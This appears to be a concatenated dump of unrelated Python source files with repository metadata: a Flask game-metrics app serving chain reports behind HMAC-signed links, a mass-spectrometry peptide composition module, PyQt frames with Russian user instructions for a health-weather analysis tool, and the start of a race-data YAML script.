end_block.append( [ 'minus 1 minute', tend-60, time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(tend-60)) ] )
rodb = read_sqlite.Rodb()
faction_name = rodb.get_faction_name(f_id)
return render_template('define_timerange.html', title='Timerange', form=form, start_block=start_block, end_block=end_block, tstart=tstart, tend=tend, f_id=f_id, faction_name=faction_name)
#=================================================================================
@app.route("/chain_reports", methods=['GET'])
@app.route("/rhubarb/chain_reports", methods=['GET'])
@login_required
def chain_reports():
rodb = read_sqlite.Rodb()
player = rodb.get_player_data(current_user.username)
faction_sum = rodb.get_faction_for_player(current_user.username)
f_id = faction_sum['fid']
chains_from_orm = Chains.query.filter_by(f_id = f_id).all()
# finished and unfinished chains
chains_fin = []
chains_unf = []
for chain in chains_from_orm:
start_text = time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(chain.tstart))
chain_len = chain.chain_len
respect = chain.respect
if chain.tend:
end_text = time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(chain.tend))
else:
end_text = time.strftime("%A %Y-%m-%d %H:%M",time.gmtime(chain.et))
# calc correct hmac
right_now = int(time.time())
chain_selection_pre = str(f_id) + '-chain-' + str(chain.tstart) + '-' + str(right_now)
chain_selection = chain_selection_pre.encode("utf-8")
hmac_hex = hmac.new(hmac_key, chain_selection, digestmod=hashlib.sha1).hexdigest()
stage = [ chain_selection_pre + '-' + hmac_hex, start_text, end_text, chain_len, respect ]
if chain.tend:
chains_fin.append(stage)
else:
chains_unf.append(stage)
faction_name = rodb.get_faction_name(f_id)
return render_template('chain_reports.html', title='Chain reports', chains_fin=chains_fin, chains_unf=chains_unf, f_id=f_id, faction_name=faction_name)
#=================================================================================
@app.route("/chain_details/<fid_tstart_timestamp_hmac>", methods=['GET'])
@app.route("/rhubarb/chain_details/<fid_tstart_timestamp_hmac>", methods=['GET'])
def chain_details(fid_tstart_timestamp_hmac):
# what chain is this meant to display?
re_object = chain_token.match(fid_tstart_timestamp_hmac)
if re_object:
f_id = re_object.group(1)
chain_tstart = re_object.group(2)
timestamp = re_object.group(3)
given_hmac = re_object.group(4)
else:
app.logger.info('in chain_details RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
chain_selection = ( str(f_id) + '-chain-' + str(chain_tstart) + '-' + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, chain_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac etc
right_now = int(time.time())
if not hmac.compare_digest(hmac_hex, given_hmac):
app.logger.info('in chain_details HMAC disagreement')
return render_template("bad_graph_request.html")
if ((int(timestamp) + 86400) < right_now):
app.logger.info('in chain_details timestamp is old')
return render_template("bad_graph_request.html")
# read from ORM which chain has the right f_id and tstart
ch = None
chains_from_orm = Chains.query.filter_by(f_id = f_id).filter_by(tstart = chain_tstart).all()
for chain in chains_from_orm:
ch = chain
if not ch:
return render_template('message.html', message='The chain you are looking for is not found.', logged_in=False)
# outline
tstart_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tstart))
if ch.tend:
et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tend))
over = True
else:
et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.et))
over = False
outline = [tstart_text, et_text, over, ch.chain_len, ch.respect ]
# members for names
who_inactive = {}
our_players = Chain_members.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
for p_mem in our_players:
who_inactive[p_mem.player_id] = p_mem.player_name + '[' + str(p_mem.player_id) + ']'
# bonus
right_now = int(time.time())
bonus_list = []
bonus_table = Bonus_events.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
for bonus in bonus_table:
if (right_now - bonus.et) > 3600:
# ok to show attacker name
try:
stage = [ who_inactive[bonus.att_id] ]
except:
stage = [ '?[' + str(bonus.att_id) + ']' ]
else:
# hide attacker name
stage = [ 'CENSORED[000000]' ]
stage.append(bonus.verb)
stage.append( bonus.def_name + '[' + str(bonus.def_id) + ']')
stage.append(bonus.outcome)
stage.append(bonus.num_respect)
bonus_list.append(stage)
bonus_list = sorted(bonus_list, key=lambda one: one[-1])
# player scoreboard (link to new route),
right_now = int(time.time())
scoreboard_chain_selection_pre = str(f_id) + '-scoreboard-' + str(chain.tstart) + '-' + str(right_now)
scoreboard_chain_selection = scoreboard_chain_selection_pre.encode("utf-8")
hmac_hex = hmac.new(hmac_key, scoreboard_chain_selection, digestmod=hashlib.sha1).hexdigest()
scoreboard_at = scoreboard_chain_selection_pre + '-' + hmac_hex + '-resd'
# inactive players
#
player_scores = Chain_player_sum.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
for p_score in player_scores:
if p_score.player_id in who_inactive:
if p_score.actions:
del who_inactive[p_score.player_id]
rodb = read_sqlite.Rodb()
faction_name = rodb.get_faction_name(f_id)
return render_template('chain_details.html', title='Chain details', f_id=f_id, outline=outline, scoreboard_at=scoreboard_at, inactive = who_inactive, bonus = bonus_list, faction_name=faction_name)
#=================================================================================
@app.route("/chain_scoreboard/<fid_tstart_timestamp_hmac>", methods=['GET'])
@app.route("/rhubarb/chain_scoreboard/<fid_tstart_timestamp_hmac>", methods=['GET'])
def chain_scoreboard(fid_tstart_timestamp_hmac):
# what chain is this meant to display?
re_object = chain_token_o.match(fid_tstart_timestamp_hmac)
if re_object:
f_id = re_object.group(1)
chain_tstart = re_object.group(2)
timestamp = re_object.group(3)
given_hmac = re_object.group(4)
orderparm = re_object.group(5)
else:
app.logger.info('in chain_player_summary RE did not match URL')
return render_template("bad_graph_request.html")
# calc correct hmac
chain_selection = ( str(f_id) + '-scoreboard-' + str(chain_tstart) + '-' + str(timestamp) ).encode("utf-8")
hmac_hex = hmac.new(hmac_key, chain_selection, digestmod=hashlib.sha1).hexdigest()
# test for correct hmac etc
right_now = int(time.time())
if not hmac.compare_digest(hmac_hex, given_hmac):
app.logger.info('in chain_player_summary HMAC disagreement')
return render_template("bad_graph_request.html")
if ((int(timestamp) + 86400) < right_now):
app.logger.info('in chain_player_summary timestamp is old')
return redirect('/rhubarb/chain_reports')
# read from ORM which chain has the right f_id and tstart
ch = None
chains_from_orm = Chains.query.filter_by(f_id = f_id).filter_by(tstart = chain_tstart).all()
for chain in chains_from_orm:
ch = chain
if not ch:
return render_template('message.html', message='The chain you are looking for is not found.', logged_in=False)
# hyperlinks for ordering table
hyper_seed = [ '/rhubarb/chain_scoreboard/' + fid_tstart_timestamp_hmac.rstrip('abcdefghijklmnopqrstuvwxyz') , 'Sort']
hyper = []
for nh in range(12):
hyper.append( hyper_seed[:] ) # copy makes these separate data items unlike [...] * N
table_column = {}
nh = 0
table_control = [['act','actions'], ['att','attacked'], ['hos','hospitalized'], ['mug','mugged'], ['res','respect'],
['ast','att_stale'], ['los','lost'], ['ate','att_escape'], ['dst','def_stale'], ['def','defend'], ['des','def_escape'], ['arh','perhit']]
for cols in table_control:
table_column[cols[0]] = cols[1]
hyper[nh][0] += cols[0] + 'd' # string addition to each column e.g. 'resd' to the end of the URL
nh += 1
# get from ORM data on this chain
# outline
tstart_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tstart))
if ch.tend:
et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.tend))
over = True
else:
et_text = time.strftime("%Y-%m-%d %H:%M",time.gmtime(ch.et))
over = False
outline = [tstart_text, et_text, over]
# members for names
who = {}
our_players = Chain_members.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
for p_mem in our_players:
who[p_mem.player_id] = p_mem.player_name + '[' + str(p_mem.player_id) + ']'
# get from ORM the chain_player_summary for this chain
bonus_list = []
bonus_table = Bonus_events.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
for bonus in bonus_table:
bonus_list.append([bonus.att_id, bonus.num_respect])
# get from ORM the chain_player_summary for this chain
summary = []
pid2av_respect = {}
pid2exp = {}
player_scores = Chain_player_sum.query.filter_by(pg_chain_id = ch.pg_chain_id).all()
for p_score in player_scores:
# average respect scores to be computed here
total_respect = p_score.respect # made by adding floats then coerced to int
num_actions = p_score.actions
# amend by subtracting bonuses
for bonus in bonus_list:
if bonus[0] == p_score.player_id:
total_respect -= bonus[1]
num_actions -= 1
# respect per action (division)
res_explanation = ''
if num_actions >= 2:
av_respect = total_respect / num_actions
res_explanation = str(total_respect) + '/' + str(num_actions)
elif num_actions == 1:
av_respect = total_respect
else:
av_respect = 0.0
summary.append(p_score)
# 2 dicts passed along with the object data but not part of it
pid2av_respect[p_score.player_id] = str(av_respect)
pid2exp[p_score.player_id] = res_explanation
# SORTING depends on a parameter passed to the route
orderparm_s = orderparm[:3] # first 3 chars key the table_colum dict
if (len(orderparm) == 4) and (orderparm[-1] == 'd'):
reverse = True
# remove 'd' from one hyperlink
nh = 0
for cols in table_control:
if cols[0] == orderparm_s:
hyper[nh][0] = hyper[nh][0][:-1]
nh += 1
else:
reverse = False
# need to sort on the right property
if orderparm_s == 'arh':
# sorting by AverageRespectPer-Hit, which is outside the summary (array of objects)
# copy dict into a list that's sorted
sorted_av_respect_per_hit = sorted(pid2av_respect.items(), key=lambda kv: kv[1], reverse=reverse)
# make a replacement summary list in the new order
position = {}
n = 0
for x in summary:
position[x.player_id] = n
n += 1
new_summary = []
for x in sorted_av_respect_per_hit:
new_summary.append( summary[position[x[0]]] )
summary = new_summary
else:
# sorting by one of the properies in the object
try:
summary = sorted(summary, key=lambda one: getattr(one, table_column[orderparm_s]), reverse=reverse)
except:
app.logger.info('sort failed - maybe bad orderparm (%s) supplied', orderparm)
# decorate the data with a rank (n) and readable name (who)
deco = []
n=1
for x in summary:
if not who[x.player_id]:
who[x.player_id] = str(x.player_id)
deco.append( [n, who[x.player_id] , x])
n += 1
rodb = read_sqlite.Rodb()
faction_name = rodb.get_faction_name(f_id)
return render_template('chain_scoreboard.html', title='Chain scoreboard', f_id=f_id, outline=outline, hyper=hyper, deco=deco, faction_name=faction_name, pid2av_respect=pid2av_respect, pid2exp=pid2exp)
#=================================================================================
def test_strength(pw):
if len(pw) < 8:
return False
digest = hashlib.sha1(bytes(pw, 'utf-8')).hexdigest()
wantsha = Banned_pw.query.filter_by(sha = digest).first()
if wantsha:
# found in table => weak
return False
return True
#=================================================================================
if __name__ == "__main__":
app.run(debug = True)
| realname0000/torn_game_metrics | flask_graph_work/app.py | app.py | py | 84,701 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.numeric",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "re.compile",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number":... |
4833398186 | import re
import json
import numbers
import numpy as np
class Composition():
__atom_mass = {
# From NIST, "https://physics.nist.gov/cgi-bin/Compositions/stand_alone.pl?ele=&all=all&isotype=some"
'neutron': 1.00866491595,
'proton': 1.007276466621,
'electron': 0.000548579909065,
'H': 1.00782503223,
'C': 12,
'N': 14.00307400443,
'O': 15.99491461957,
'P': 30.97376199842,
'S': 31.9720711744
}
def __init__(self, class_input):
if type(class_input) == str:
if class_input.isupper():
formular_string = class_input
if formular_string[0] == '-':
self.composition = {i[0]: -int(i[1]) if i[1] else -int(1) for i in
re.findall("([A-Z][a-z]?)(\d*)", formular_string)}
else:
self.composition = {i[0]: int(i[1]) if i[1] else int(1) for i in
re.findall("([A-Z][a-z]?)(\d*)", formular_string)}
else:
self.composition = {class_input:1}
elif type(class_input) == dict:
self.composition = class_input
else:
raise TypeError
self.mass = self.mass_calculater()
def __add__(self, other):
result = {}
if isinstance(other, Composition):
for k in self.composition:
result.update({k: self.composition[k]})
for k in other.composition:
try:
result[k] += other.composition[k]
if result[k] == 0: result.pop(k)
except KeyError:
result.update({k: other.composition[k]})
return Composition(result)
else:
return NotImplemented
def __sub__(self, other):
result = {}
if isinstance(other, Composition):
for k in self.composition:
result.update({k: self.composition[k]})
for k in other.composition:
try:
result[k] -= other.composition[k]
if result[k] == 0: result.pop(k)
except KeyError:
result.update({k: -other.composition[k]})
return Composition(result)
else:
return NotImplemented
def __mul__(self, other):
if isinstance(other, numbers.Integral):
result = {}
for k in self.composition:
result.update({k: other * self.composition[k]})
return Composition(result)
else:
return NotImplemented
def __eq__(self, other):
if isinstance(other, Composition):
return self.composition==other.composition
else:
return NotImplemented
def __gt__(self, other):
if isinstance(other, Composition):
return self.mass>other.mass
else:
return NotImplemented
def __ge__(self, other):
if isinstance(other, Composition):
return self.mass>=other.mass
else:
return NotImplemented
def __lt__(self, other):
if isinstance(other, Composition):
return self.mass<other.mass
else:
return NotImplemented
def __le__(self, other):
if isinstance(other, Composition):
return self.mass<=other.mass
else:
return NotImplemented
def __hash__(self):
return hash(json.dumps(self.composition,sort_keys=True))
def __repr__(self):
return 'Composition('+str(self.composition)+')'
def __str__(self):
return 'Composition('+str(self.composition)+')'
def mass_calculater(self):
result = 0
for k in self.composition:
result += self.composition[k] * self.__atom_mass[k]
return result
def comp2formula(self):
seq=''
for k in self.composition:
seq+=k+str(self.composition[k])
return seq
@classmethod
def output_neutron(cls):
return cls.__atom_mass['neutron']
class Residual_seq():
__aa_residual_composition = {
'A': Composition('C3H5ON'),
'R': Composition('C6H12ON4'),
'N': Composition('C4H6O2N2'),
#'N(+.98)': Composition('C4H6O2N2') - Composition('NH3') + Composition('H2O'),
'D': Composition('C4H5O3N'),
#'C': Composition('C3H5ONS'),
'c': Composition('C3H5ONS') - Composition('H') + Composition('C2H4ON'),
'E': Composition('C5H7O3N'),
'Q': Composition('C5H8O2N2'),
#'Q(+.98)': Composition('C5H8O2N2') - Composition('NH3') + Composition('H2O'),
'G': Composition('C2H3ON'),
'H': Composition('C6H7ON3'),
'I': Composition('C6H11ON'),
#'L': Composition('C6H11ON'),
'K': Composition('C6H12ON2'),
'M': Composition('C5H9ONS'),
'm': Composition('C5H9ONS') + Composition('O'),
'F': Composition('C9H9ON'),
'P': Composition('C5H7ON'),
'S': Composition('C3H5O2N'),
'T': Composition('C4H7O2N'),
'W': Composition('C11H10ON2'),
'Y': Composition('C9H9O2N'),
'V': Composition('C5H9ON'),
}
def __init__(self, seqs):
seq = [i for i in seqs if not i.isspace()]
self.step_mass = []
tmp = self.__aa_residual_composition[seq[0]]
for i in seq[1:]:
self.step_mass.append(tmp.mass)
tmp += self.__aa_residual_composition[i]
self.seq = seq
self.composition = tmp
self.mass = tmp.mass
self.step_mass.append(self.mass)
self.step_mass = np.array(self.step_mass)
def __repr__(self):
return str(self.seq)
def __str__(self):
return str(self.seq)
@classmethod
def reset_aadict(cls,newAAdict):
cls.__aa_residual_composition = newAAdict
@classmethod
def remove_from_aadict(cls, keys):
for key in keys:
cls.__aa_residual_composition.pop(key)
@classmethod
def add_to_aadict(cls, additional_AAcomps):
for additional_AAcomp in additional_AAcomps:
cls.__aa_residual_composition.update(additional_AAcomp)
@classmethod
def output_aalist(cls):
return list(cls.__aa_residual_composition.keys())
@classmethod
def output_aadict(cls):
return cls.__aa_residual_composition
@classmethod
def seqs2composition_list(cls,seq):
return [cls.__aa_residual_composition[aa] for aa in seq]
@classmethod
def seqs2massmap(cls,seq):
return [cls.__aa_residual_composition[aa].mass for aa in seq]
class Ion():
# Ion offset design from http://www.matrixscience.com/help/fragmentation_help.html
# Part: Formulae to Calculate Fragment Ion m/z values
__ion_offset = {
'a': Composition('-CHO'),
'a-NH3': Composition('-CHO') + Composition('-NH3'),
'a-H2O': Composition('-CHO') + Composition('-H2O'),
'b': Composition('-H'),
'b-NH3': Composition('-H') + Composition('-NH3'),
'b-H2O': Composition('-H') + Composition('-H2O'),
#'c': Composition('NH2'),
#'x': Composition('CO') + Composition('-H'),
'y': Composition('H'),
'y-NH3': Composition('H') + Composition('-NH3'),
'y-H2O': Composition('H') + Composition('-H2O'),
#'z': Composition('-NH2')
}
__term_ion_offset = {
'a': Composition('-CHO') + Composition('H'),
'a-NH3': Composition('-CHO') + Composition('-NH3') + Composition('H'),
'a-H2O': Composition('-CHO') + Composition('-H2O') + Composition('H'),
'b': Composition('-H') + Composition('H'),
'b-NH3': Composition('-H') + Composition('-NH3') + Composition('H'),
'b-H2O': Composition('-H') + Composition('-H2O') + Composition('H'),
#'c': Composition('NH2') + Composition('H'),
#'x': Composition('CO') + Composition('-H') + Composition('OH'),
'y': Composition('H') + Composition('OH'),
'y-NH3': Composition('H') + Composition('-NH3') + Composition('OH'),
'y-H2O': Composition('H') + Composition('-H2O') + Composition('OH'),
#'z': Composition('-NH2') + Composition('OH')
}
@classmethod
def set_ionoffset_endterm(cls,nterm='H',cterm='OH'):
result = {}
for k in cls.__ion_offset:
if k[0] == 'a' or k[0] == 'b' or k[0] == 'c':
result.update({k: cls.__ion_offset[k] + Composition(nterm)})
elif k[0] == 'x' or k[0] == 'y' or k[0] == 'z':
result.update({k: cls.__ion_offset[k] + Composition(cterm)})
cls.__term_ion_offset = result
@classmethod
def peak2sequencemz(cls, peak_mz, ion, charge=None):
if charge==None:
charge = int(ion[0])
ion = ion[1:]
return (peak_mz-Composition('proton').mass)*charge-cls.__term_ion_offset[ion].mass
@classmethod
def peptide2ionmz(cls, seq, ion, charge):
ion_compsition = Residual_seq(seq).composition+cls.__term_ion_offset[ion]+Composition('proton')*charge
ion_mass = ion_compsition.mass/charge
return ion_mass
@classmethod
def sequencemz2ion(cls, seqmz, ion, charge=None):
if charge==None:
charge = int(ion[0])
ion = ion[1:]
return (seqmz+cls.__term_ion_offset[ion].mass)/charge+Composition('proton').mass
@classmethod
def precursorion2mass(cls, precursor_ion_moverz, precursor_ion_charge):
#Composition('H2O') 是n端和c端原子的总和,但是如果做TMT或者其他对N,C端修饰的需要进行修改
return precursor_ion_moverz*precursor_ion_charge-Composition('H2O').mass-precursor_ion_charge*Composition('proton').mass
@classmethod
def add_ion(cls,ion_comps):
for ion_comp in ion_comps:
cls.__ion_offset.update(ion_comp)
cls.set_ionoffset_endterm()
@classmethod
def remove_ion(cls, keys):
for key in keys:
cls.__ion_offset.pop(key)
cls.set_ionoffset_endterm()
@classmethod
def reset_ions(cls, ion_comps):
cls.__ion_offset = ion_comps
cls.set_ionoffset_endterm()
@classmethod
def output_ions(cls):
return list(cls.__ion_offset.keys())
| AmadeusloveIris/GraphNovo | genova/utils/BasicClass.py | BasicClass.py | py | 10,351 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "re.findall",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "numbers.Integral",
"line_number": 69,
"usage_type": "attribute"
},
{
"api_name": "json.dumps",
"line_nu... |
15719814735 | from PyQt5.QtWidgets import QCheckBox, QDialog, QDialogButtonBox, QTextEdit
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFont
from src.logic import QFrameBase, error_dialog
from src.frames.default import Ui_FrameDefault
from src.frames.utils.info import Ui_FrameInfo
from src.frames.utils.kde import Ui_FrameKde
from src.frames.utils.image import Ui_FrameImage
from src.frames.utils.text import Ui_FrameText
from src.frames.utils.standard_type import Ui_FrameStandardType
from src.frames.dialogs.stds import Ui_DialogStds
from src.reports import print_report
from src.science import FACTORS_ALL
from src.science.classes import Standard
class QFrameDefault(QFrameBase, Ui_FrameDefault):
INSTRUCTIONS = \
"""Терминология:
* параметры погоды называются Эталонами,
* медицинские данные пациентов называются Образцами,
* отдельные факторы Образцов называются фактор-образцами
ВСЕ СТОЛБЦЫ В xlsx ФАЙЛАХ ОБЯЗАТЕЛЬНЫ К ЗАПОЛНЕНИЮ
С помощью кнопки «Добавить Пациента» заполняем данные о пациенте (все данные обязательны к заполнению) после этого, нажав кнопку «Добавить»
можно добавить пациента в базу пациентов.
С помощью кнопки «Добавить Показатели Пациента» можем выбрать пациента и базы пациентов и добавить для него показатели из xlsx файла,
нажав кнопку «Добавить показатели». При нажатии на эту кнопку можно выбрать xlsx файл с медицинскими данными пациента, они загружаются сразу четырьмя временными рядами (по факторам «без нагрузки», с физической нагрузкой», «с эмоциональной нагрузкой», «после отдыха») из xlsx-файла НА ДАННЫЙ МОМЕНТ МОЖНО ИССЛЕДОВАТЬ ТОЛЬКО КОЭФФИЦИЕНТ СИММЕТРИИ (symmetry). Столбец A – Дата в формате дд.мм.гггг и так далее столбцы BCD - параметры. Каждая ячейка – дробное число, кроме ячеек ПЕРВОГО столбца - это дата и ПОСЛЕДНЕГО - это физическое состояние пациента (строка).
С помощью кнопки «Добавить Эталон» можем выбрать xlsx файл с параметрами погоды. Столбец A – Дата в формате дд.мм.гггг и так далее столбцы BCD - параметры. Каждая ячейка – дробное число, кроме ячеек ПЕРВОГО столбца - это дата.
«Эталоны» – параметры погоды в xlsx файле расположенные в следующем порядке (Название парамера: столбец в xlsx файле):
'Дата исследования': 'date' (строка в формате дд.мм.гггг)
'Приземная скорость ветра': 'surface_wind_speed' (вещественное число, дробная часть отделяется от целой символом точки)
'Приземная температура': 'surface_temp' (вещественное число, дробная часть отделяется от целой символом точки)
'Приземная влажность': 'surface_wet' (вещественное число, дробная часть отделяется от целой символом точки)
'Приземное давление': 'surface_press' (вещественное число, дробная часть отделяется от целой символом точки)
'BX': 'bx_mmp' (вещественное число, дробная часть отделяется от целой символом точки)
'BY': 'by_mmp' (вещественное число, дробная часть отделяется от целой символом точки)
'BZ': 'bz_mmp' (вещественное число, дробная часть отделяется от целой символом точки)
'B-Vector': 'b_vector_mmp' (вещественное число, дробная часть отделяется от целой символом точки)
'Плотность протонов солнеччного ветра': 'proton_density' (вещественное число, дробная часть отделяется от целой символом точки)
'Скорость плазмы солнечного ветра': 'plasma_speed' (вещественное число, дробная часть отделяется от целой символом точки)
'Давление солнечного ветра': 'press_sun_wind' (вещественное число, дробная часть отделяется от целой символом точки)
'КР': 'kp_index' (вещественное число, дробная часть отделяется от целой символом точки)
'Радиоизлучение': 'radio_emission' (вещественное число, дробная часть отделяется от целой символом точки)
'Рентгеновское излучение Солнца-1': 'xray_sun_one' (вещественное число, дробная часть отделяется от целой символом точки)
'Рентгеновское излучение Солнца-2': 'xray_sun_two' (вещественное число, дробная часть отделяется от целой символом точки)
'Ультрофиолет-A': 'ultraviolet_a' (вещественное число, дробная часть отделяется от целой символом точки)
'Ультрофиолет-B': 'ultraviolet_b' (вещественное число, дробная часть отделяется от целой символом точки)
'Ультрофиолет-C': 'ultraviolet_c' (вещественное число, дробная часть отделяется от целой символом точки)
«Пациенты» – медицинские данные пациентов в xlsx файле расположенные в следующем порядке (Название параметра: cтолбец в xlsx файле):
'Дата исследования': 'date' (строка в формате дд.мм.гггг)
'Коэффициент симметрии': 'symmetry' (вещественное число, дробная часть отделяется от целой символом точки)
'Верхнее артериальное давление': 'upper_arterial_pressure' (вещественное число, дробная часть отделяется от целой символом точки)
'Нижнее арториальное давление': 'lower_arterial_pressure' (вещественное число, дробная часть отделяется от целой символом точки)
'chss': 'chss' (вещественное число, дробная часть отделяется от целой символом точки)
'variab': 'variab' (вещественное число, дробная часть отделяется от целой символом точки)
'Угол': 'angle' (вещественное число, дробная часть отделяется от целой символом точки)
'Состояние пациента при исследованиии': 'patients_state' (1 - без нагрузки, 2 - с физической нагрузкой, 3 - с эмоциональной нагрузкой, 4 - после отдыха)
'Физическое состояние пациента': 'physical_state' (любая строка)
В окне «Ведущий ряд» выбирается любой из загруженных файлов, затем в окне «Ведомый ряд» выбирается также любой из загруженных файлов (ряды распределения расстояний формируются от максимумов Ведомого ряда до максимумов Ведущего ряда)
В основном окне показываются фрагменты анализа в зависимости от выбранных кнопок «Все факторы», «Без нагрузки», «С физической нагрузкой», «С эмоциональной нагрузкой», «После отдыха», «Визуализация», «Статистика», «Тестирование нормальности», «4-х ядерные оценки» (график показывает ядерные оценки плотности распределений для всех факторов), «3-х ядерные оценки» (график показывает ядерные оценки плотности распределений расстояний от максимумов факторов «С физической нагрузкой», «С эмоциональной нагрузкой», «После отдыха» до фактора «Без нагрузки»)
Для формирования файла отчета (в формате docx) по выбранному эталону необходимо нажать кнопку «Сформировать отчет», в открывшемся окне выбрать фактор или все факторы и нажать кнопку «Сохранить» – будет предложено выбрать название файла и место для сохранения.
Для формирования файла отчета (в формате docx) по группе эталонов необходимо нажать кнопку «Сформировать групповой отчет», в открывшемся окне выбрать группу эталонов и фактор и нажать кнопку «Сохранить» – будет предложено выбрать название файла и место для сохранения.
"""
def __init__(self, parent):
QFrameBase.__init__(self, parent, Ui_FrameDefault)
self.add_text(QFrameDefault.INSTRUCTIONS, self.instructions_edit)
delattr(self.instructions_edit, "c_updating")
font = QFont("Times New Roman", 11)
self.instructions_edit.setFont(font)
self.instructions_edit.verticalScrollBar().setEnabled(True)
class QFrameInfo(QFrameBase, Ui_FrameInfo):
def __init__(self, parent, report, val_type: str = "val"):
QFrameBase.__init__(self, parent, Ui_FrameInfo)
self.report = report
self.val_type = val_type
self.frames = [QFrameImage(self, self.report, self.val_type),
QFrameText(self, self.report, self.val_type, 'stat'),
QFrameText(self, self.report, self.val_type, 'ntest')]
for info in range(3):
self.tabs.widget(info).layout().insertWidget(0, self.frames[info])
# Убрать, объединить в одно с классом Info
class QFrameInfoKde(QFrameBase, Ui_FrameInfo):
def __init__(self, parent, report, val_type: str = "val"):
QFrameBase.__init__(self, parent, Ui_FrameInfo)
self.report = report
self.val_type = val_type
self.frames = [QFrameKde(self, self.report), QFrameText(self, self.report, self.val_type, 'stat'),
QFrameText(self, self.report, self.val_type, 'ntest')]
for info in range(3):
self.tabs.widget(info).layout().insertWidget(0, self.frames[info])
# KDE куда лучше убрать
class QFrameKde(QFrameBase, Ui_FrameKde):
def __init__(self, parent, report):
QFrameBase.__init__(self, parent, Ui_FrameKde)
self.report = report
self.frames = [QFrameImage(self, self.report, "kde"), QFrameImage(self, self.report, "kde3")]
for info in range(2):
self.tabs.widget(info).layout().insertWidget(0, self.frames[info])
class QFrameImage(QFrameBase, Ui_FrameImage):
def __init__(self, parent, report, va_type: str):
QFrameBase.__init__(self, parent, Ui_FrameImage)
self.report = report
self.va_type = va_type
self.va, self.image_name = self.get_va()
self.add_image(self.va, self.image, self.image_name)
# Убрать отсюда
def get_va(self):
if self.va_type == "val":
return self.report.va, 'va_img1'
elif self.va_type == "apl":
return self.report.va_apl, 'va_img2'
elif self.va_type == "kde":
return self.report.kde, 'label_kde_img'
elif self.va_type == "kde3":
return self.report.kde3, 'label_kde3_img'
class QFrameStandardType(QFrameBase, Ui_FrameStandardType):
def __init__(self, parent, report):
QFrameBase.__init__(self, parent, Ui_FrameStandardType)
self.report = report
self.frames = [QFrameInfo(self, self.report, "val"), QFrameInfo(self, self.report, "apl")]
for info in range(2):
self.tabs.widget(info).layout().insertWidget(0, self.frames[info])
class QFrameText(QFrameBase, Ui_FrameText):
def __init__(self, parent, report, val_type: str, func_name: str):
QFrameBase.__init__(self, parent, Ui_FrameText)
self.report = report
self.val_type = val_type
self.func_name = func_name
self.add_text(print_report('ui', self.get_func()), self.text_edit)
# Убрать отсюда
def get_func(self):
if self.val_type == "val":
return self.func_val()
elif self.val_type == "apl":
return self.func_apl()
elif self.val_type == "kde":
return self.func_kde()
# Убрать отсюда
def func_val(self):
if self.func_name == "stat":
return self.report.get_report_stat
else:
return self.report.get_report_ntest
# Убрать отсюда
def func_apl(self):
if self.func_name == "stat":
return self.report.get_report_stat_apl
else:
return self.report.get_report_ntest_apl
# Убрать отсюда
def func_kde(self):
if self.func_name == "stat":
return self.report.get_report_stat3
else:
return self.report.get_report_ntest3
class QDialogStds(QDialog, Ui_DialogStds):
def __init__(self, parent, **kwargs):
# noinspection PyArgumentList
QDialog.__init__(self, parent)
Ui_DialogStds.setupUi(self, self)
self.dimension = 1
self.result = None
# Эталоны
self.get_stds = kwargs.get("get_stds", False)
self.std_main = kwargs.get("std_main", None)
if self.get_stds:
self.dimension += 1
# Факторы
self.btn_all.setChecked(True)
# Эталоны
if self.get_stds:
self.cbs = []
for v in reversed(sorted(list(Standard.standards.keys()))):
self.cbs.append(QCheckBox(v, self))
if self.std_main is None or self.std_main != v:
self.cbs[-1].setChecked(False)
else:
self.cbs[-1].setChecked(1)
self.layout_stds.insertWidget(0, self.cbs[-1])
else:
self.layout().removeItem(self.layout_stds)
self.buttons.button(QDialogButtonBox.Save).setText("Сохранить")
self.buttons.button(QDialogButtonBox.Cancel).setText("Отмена")
self.setWindowFlags(self.windowFlags() ^ Qt.WindowContextHelpButtonHint)
def accept(self):
self.result = []
# Факторы
if self.btn_all.isChecked():
factor = FACTORS_ALL
else:
for idx in range(4):
if self.__dict__["btn_{}".format(idx)].isChecked():
factor = idx
break
else:
error_dialog("Не выбран ни один фактор/все факторы")
return
self.result.append(factor)
# Эталоны
if self.get_stds:
stds = [cb.text() for cb in self.cbs if cb.isChecked()]
if not len(stds):
error_dialog("Выберите по крайней мере один эталон")
return
self.result.append(stds)
QDialog.accept(self)
@staticmethod
def settings(parent, **kwargs):
dialog = QDialogStds(parent, **kwargs)
if dialog.exec():
res = dialog.result
else:
res = [None] * dialog.dimension
return res[0] if len(res) == 1 else res
| qooteen/health-weather_correlation-master | src/logic/utils.py | utils.py | py | 17,580 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "src.logic.QFrameBase",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "src.frames.default.Ui_FrameDefault",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "src.logic.QFrameBase.__init__",
"line_number": 79,
"usage_type": "call"
},
{
... |
40943557380 | from ruamel.yaml import YAML
from datetime import datetime
from common import *
import sys
def main():
fn = 'data/races.yaml'
if len(sys.argv) > 1:
fn = sys.argv[1]
yaml = YAML(typ='safe')
with open(fn, 'r') as fi:
ydat = yaml.load(fi)
prev_date = None
for race in ydat['races']:
dt = datetime.fromisoformat(race['datetime']).replace(tzinfo=RACETZ)
